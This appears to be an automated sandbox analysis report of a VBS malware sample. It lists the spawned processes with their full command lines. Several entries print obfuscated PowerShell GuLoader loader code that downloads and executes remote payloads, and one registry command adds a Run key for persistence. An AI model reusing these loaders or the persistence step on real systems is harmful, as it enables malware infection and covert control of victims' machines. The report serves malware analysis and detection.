                                                        2024-03-18 07:09:11 UTC8000INData Raw: ce de a7 84 56 5d c3 b5 ae 3b 87 bd 62 af 74 2d 0d 3d 16 e9 df 2c e6 41 b1 e0 e0 3f 26 82 07 00 43 4e db 00 24 b8 98 df 32 03 a3 e3 e4 d7 d0 25 12 61 18 82 a6 59 d3 d8 ac d9 7c e1 db 2b a7 97 c6 e9 d1 94 86 b0 53 b1 9f 32 74 7b ba 7e 93 b6 f3 ea c4 1d 75 26 8c 48 d0 6e ac 27 a9 4e 5f 05 11 ff 11 eb 6a b2 a3 ce 8d 45 0e 90 99 66 ce 70 0a 86 25 0c c4 92 63 4f d3 80 13 fb 28 11 bd c2 55 62 51 83 ae 6d fe f9 d6 d7 86 94 ef fa 71 5a 1b d0 76 ef b4 7a 99 42 6e c7 2b 4f 35 e5 d4 f1 14 b6 db 4b 07 b6 76 87 ad 7b 32 ff 8e 4b 61 13 9f 21 1a 76 a6 1a 5c 20 eb 74 4d 3d 45 3b ec e5 ee 03 25 77 b7 37 06 e3 38 f2 ed 0f 58 5e ef b8 26 c6 a1 ee f6 66 76 a3 77 fb 22 af 4b 63 96 88 67 da 43 05 7c 05 53 8b a7 f2 24 72 c2 6d c7 97 c5 37 23 7e cb 56 5d 04 ac d8 9c 30 a4 e7 69
                                                        Data Ascii: V];bt-=,A?&CN$2%aY|+S2t{~u&Hn'N_jEfp%cO(UbQmqZvzBn+O5Kv{2Ka!v\ tM=E;%w78X^&fvw"KcgC|S$rm7#~V]0i


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:07:09
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs"
                                                        Imagebase:0x7ff62f920000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:08:07:21
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessness ' Net,SHj,pet MedmaAcoelr ThiotGal.e-Svi.eBDe.atiBindet M,dosRe.rsTo.sporOmentaud ign WennssynkrfUnmete Kalvr Ungo ompa-DialeS andlo Kon uForgir SkrucHypoceulovl P,eud$ BramPMiscolL,stoa,turtnCronetSo nee mutts EnerkSfa toMetrolNu bieStenbssalgs Langt- onfiDMaddieVejrfs Gr,ot A cuiUnmagnGld sa kalktNoniniGenopoKo.lenIntra A,try$HagbaVGrappa ProrlU,thusGermaeNonobn T.ibdAfskreGuar sRecid ';&($Affattendes62) (quenchlessness 'Zyg e$ PoluVEnganaT.rsklNongesPellaeRu lenMi.jpdF rgaeErot.sPrint= Abst$F.rtreTortsnSprinvC,ank: errea.hrespnosogpSpoond ZimbasyncrtBe fiaAccru ') ;&($Affattendes62) (quenchlessness 'Ov.rjIShaham Fo.ypStalloGli.mrU,nmatXenop- algdMTechnoKonced Kamau.sesilCelureBond. Da,otBOpkl.i BefutSprngsKomp,Ttelepr mortaAppr n.angesimputfKlendeseg.erKi.de ') ;$Valsendes=$Valsendes+'\Ototoxicity.Non';while (-not $Rkenlandskaben) {&($Affattendes62) (quenchlessness 'Delsa$.esegRBi inkLngdeeKnowln skollArendaVinklnUnsatdGe.tisbaggrkSlak aCorribSero.eAgternOv.rs=.yncy( CounTPrinte Senes Ov rtFyldn-Almg PAsy,paMisiotIn xthKo si Fjedd$ SkolVEnsn,aKampulBladlsTunneeSprinnSecredGradae Af lsG,rlo)Coker ') ;&($Affattendes62) $Chlorocarbon216;&($Affattendes62) (quenchlessness 'Un.erSdyspntBeaklaTilpar Antithawks-ModarSbaadelUprigeCentieFre,tpPr.ff itu5Tippl ');$Planteskoles=$Udenrigsredaktrerne[$havbiologers++%$Udenrigsredaktrerne.count];}&($Affattendes62) (quenchlessness 'Aaben$FigurFKomonrPr.fuiInt.rf O eruIm acnSnorsdUntainKrafteKasersTingf2Smin,4Unswa9David Rette=,deno MurziGDeponemultitAchie-MalacCDarneo StranflyvetrisoteGar enIncudtFremg Foru$filkaVViatiaC mmulStinks PhyleforannAareldSkovle Holos,mmet ');&($Affattendes62) (quenchlessness 'Krema$overaMAbiogaChapalBasibgDybvarGallo Folke=Pyrom Tegne[ForskSjeopay Spagsoff,ntLolloe,rabamMisch.Is,gaCFolksoAnlben DissvLertjeTenibr hirtMetro]Uls.e: Mark:SitopFLandbrhypoho Col,mDioptBA tena Ordas Fo,ee Tyra6 Opsk4T lsaS.ejret G llrUnmaniAccr.nAutocgPhili(Ecoci$CamphF.palsrPhotoiSupe,fIndf uHalvdn DansdU,rulnAnticeAftvts Ret 2Fi te4Neotr9Kro.s) Onyc ');&($Affattendes62) (quenchlessness ' yclo$EpaxiUToughnTolu,dConsooPa donUdkaneDecol2di,ul3 Hk.e9Arbej G.nbr=,vlst Blenn[Fde,aSRubleyFabr.sConsitl.teleTcku mExpec. S.ooT SkrieMoriaxDrumltArcht.Spor E Stten LadycKejseoBarord.usleiSte snEmajagUrefl]Forms:Preen:,ipefAPastoSe sprC,oculIHomoeIextre. KirkGBarbie,tatutArchnS lpert endirKraveiSurf.n,edisg Cock(.kabe$BalleMEffekaHallml AmphgnothirMaidl) ,obb ');&($Affattendes62) (quenchlessness 'ambys$ onjuDB.omci Pa,tmPremieinfrat NotorHvemao nspndFrankoHoftenUnimp=Fores$HylomUHoundnJingadUnhomoBanden ente necd2 Cr,m3Bors,9Bolig.T uthsUdvalu A tib TrdnsN.nnit.oredrPackwi Gennn RdsegVitia(Longe3Verg 3Polyp6 Nvni5Korre4.hedt7Brahm,Upcra2.arru5 Incu8He.od1Hypo 8Mod,m)Decel ');&($Affattendes62) $Dimetrodon;}
                                                        Imagebase:0x7ff7be880000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:08:07:21
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:08:07:23
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessness ' Net,SHj,pet MedmaAcoelr ThiotGal.e-Svi.eBDe.atiBindet M,dosRe.rsTo.sporOmentaud ign WennssynkrfUnmete Kalvr Ungo ompa-DialeS andlo Kon uForgir SkrucHypoceulovl P,eud$ BramPMiscolL,stoa,turtnCronetSo nee mutts EnerkSfa toMetrolNu bieStenbssalgs Langt- onfiDMaddieVejrfs Gr,ot A cuiUnmagnGld sa kalktNoniniGenopoKo.lenIntra A,try$HagbaVGrappa ProrlU,thusGermaeNonobn T.ibdAfskreGuar sRecid ';&($Affattendes62) (quenchlessness 'Zyg e$ PoluVEnganaT.rsklNongesPellaeRu lenMi.jpdF rgaeErot.sPrint= Abst$F.rtreTortsnSprinvC,ank: errea.hrespnosogpSpoond ZimbasyncrtBe fiaAccru ') ;&($Affattendes62) (quenchlessness 'Ov.rjIShaham Fo.ypStalloGli.mrU,nmatXenop- algdMTechnoKonced Kamau.sesilCelureBond. Da,otBOpkl.i BefutSprngsKomp,Ttelepr mortaAppr n.angesimputfKlendeseg.erKi.de ') ;$Valsendes=$Valsendes+'\Ototoxicity.Non';while (-not $Rkenlandskaben) {&($Affattendes62) (quenchlessness 'Delsa$.esegRBi inkLngdeeKnowln skollArendaVinklnUnsatdGe.tisbaggrkSlak aCorribSero.eAgternOv.rs=.yncy( CounTPrinte Senes Ov rtFyldn-Almg PAsy,paMisiotIn xthKo si Fjedd$ SkolVEnsn,aKampulBladlsTunneeSprinnSecredGradae Af lsG,rlo)Coker ') ;&($Affattendes62) $Chlorocarbon216;&($Affattendes62) (quenchlessness 'Un.erSdyspntBeaklaTilpar Antithawks-ModarSbaadelUprigeCentieFre,tpPr.ff itu5Tippl ');$Planteskoles=$Udenrigsredaktrerne[$havbiologers++%$Udenrigsredaktrerne.count];}&($Affattendes62) (quenchlessness 'Aaben$FigurFKomonrPr.fuiInt.rf O eruIm acnSnorsdUntainKrafteKasersTingf2Smin,4Unswa9David Rette=,deno MurziGDeponemultitAchie-MalacCDarneo StranflyvetrisoteGar enIncudtFremg Foru$filkaVViatiaC mmulStinks PhyleforannAareldSkovle Holos,mmet ');&($Affattendes62) (quenchlessness 'Krema$overaMAbiogaChapalBasibgDybvarGallo Folke=Pyrom Tegne[ForskSjeopay Spagsoff,ntLolloe,rabamMisch.Is,gaCFolksoAnlben DissvLertjeTenibr hirtMetro]Uls.e: Mark:SitopFLandbrhypoho Col,mDioptBA tena Ordas Fo,ee Tyra6 Opsk4T lsaS.ejret G llrUnmaniAccr.nAutocgPhili(Ecoci$CamphF.palsrPhotoiSupe,fIndf uHalvdn DansdU,rulnAnticeAftvts Ret 2Fi te4Neotr9Kro.s) Onyc ');&($Affattendes62) (quenchlessness ' yclo$EpaxiUToughnTolu,dConsooPa donUdkaneDecol2di,ul3 Hk.e9Arbej G.nbr=,vlst Blenn[Fde,aSRubleyFabr.sConsitl.teleTcku mExpec. S.ooT SkrieMoriaxDrumltArcht.Spor E Stten LadycKejseoBarord.usleiSte snEmajagUrefl]Forms:Preen:,ipefAPastoSe sprC,oculIHomoeIextre. KirkGBarbie,tatutArchnS lpert endirKraveiSurf.n,edisg Cock(.kabe$BalleMEffekaHallml AmphgnothirMaidl) ,obb ');&($Affattendes62) (quenchlessness 'ambys$ onjuDB.omci Pa,tmPremieinfrat NotorHvemao nspndFrankoHoftenUnimp=Fores$HylomUHoundnJingadUnhomoBanden ente necd2 Cr,m3Bors,9Bolig.T uthsUdvalu A tib TrdnsN.nnit.oredrPackwi Gennn RdsegVitia(Longe3Verg 3Polyp6 Nvni5Korre4.hedt7Brahm,Upcra2.arru5 Incu8He.od1Hypo 8Mod,m)Decel ');&($Affattendes62) $Dimetrodon;}
                                                        Imagebase:0xac0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2804880582.0000000008BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2804900033.0000000008CCE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:08:07:26
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7e52b0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:08:08:03
                                                        Start date:18/03/2024
                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe
                                                        Imagebase:0xcf0000
                                                        File size:516'608 bytes
                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:10
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs"
                                                        Imagebase:0xda0000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"
                                                        Imagebase:0x20000
                                                        File size:59'392 bytes
                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:08:08:15
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x180000
                                                        File size:418'304 bytes
                                                        MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:15
                                                        Start time:08:08:26
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatn.ibboeScarfsBefips.iljg Skink-LagerDCuiraeSamfusLap,etI dumiPri mnLarynaRecont SquaiFlybloAlfefn Coun Chif$TelluSBes.retaarek SpkhsSagtetHesteuF rarrWla,isDiner ';&($Batiste) (Cert69 'Re ri$ StanSSpdeke Kni.kPortesTrkpltB,ctruLuminrHemiesNubig=Offen$Totrie Burenopis.vFuld :.onpaaBlindpSvi.rpI jekd ,runaGuld.tSmanda,ille ') ;&($Batiste) (Cert69 'SerbiIIndifmE,erepskn,eo Foger Mongt Reci-.urtiMreat.o Tilsd DomeuA frel H.nde Fang Na urBKontriLy,tet Lic sMa,moTLoamir,niataUdkonnU.trasTirvef SrsteBole.rBenzy ') ;$Seksturs=$Seksturs+'\Hovedbygningens.Cou';while (-not $Afmonteringernes) {&($Batiste) (Cert69 'Sikke$TrskoASter fMonopmNondeocurionmu.hntCopreeFr turFiltriToftenNyskrgSyn.heCenterSkuldnSippeetennisNedlu= anre(DecasT ForheForelsR,tratAffa - Le,uP TranaNasc.t An shTomle Perif$ Fir,SKldereDeci.kVej.es undktUnferuTast rSelvrsSlagt)V kat ') ;&($Batiste) $Thysen;&($Batiste) (Cert69 'sawloS Desst FamiaChartrforhot utro-AliamS Lokol SitheCo leeGlarrp Ga.t Jamn 5Preba ');$uppishness=$Wergilds[$Sureste++%$Wergilds.count];}&($Batiste) (Cert69 ' Trg $pulveNTreaceLyriccLin.etCanguaFortrn Thead SvanrB gflaPhoto Nyord= Pred UdkldGBrndseFritnt rako-Un,bsCDunstoMillinConcrt Cu iemikron mo.utstart Lykke$DomicSAspise ohorkgalsisK,rdutPe aluOutscr Jos s ovtr ');&($Batiste) (Cert69 'Ref,o$ Vel,oTittemDom,rk.ovieaFritir,epart Trife S.lirSeni,iKalibnSkaktgStikbs Com koler=Kreat rave[Un orSKreplyDiebasAfvejtAnsige San,mfor.o.OppugCUn eco .vern 